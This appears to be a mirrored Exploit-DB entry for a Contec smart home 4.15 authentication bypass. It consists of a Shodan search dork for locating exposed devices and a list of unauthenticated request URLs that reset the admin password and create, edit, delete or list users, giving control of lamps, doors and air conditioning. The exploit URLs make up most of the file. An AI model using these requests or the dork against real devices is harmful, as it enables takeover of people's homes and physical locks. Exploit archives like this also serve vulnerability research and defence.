bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/44295.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

30 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

# Title : Contec smart home 4.15 Unauthorized Password Reset
# Shodan Dork : "content/smarthome.php"
# Vendor Homepage : http://contec.co.il
# Tested on : Google Chrome
# Tested version : 4.15
# Date : 2018-03-14
# Author : Z3ro0ne
# Contact : saadousfar59@gmail.com
# Facebook Page : https://www.facebook.com/Z3ro0ne
# Vulnerability description :
the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
# Exploit
To Reset Admin password
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
To Create a new user
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
To edit a user
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
To Delete a user
http://Ipaddress:port/content/delete_user.php?user_name=USER
Users list
http://Ipaddress:port/content/user.php
Reference in a new issue View git blame Copy permalink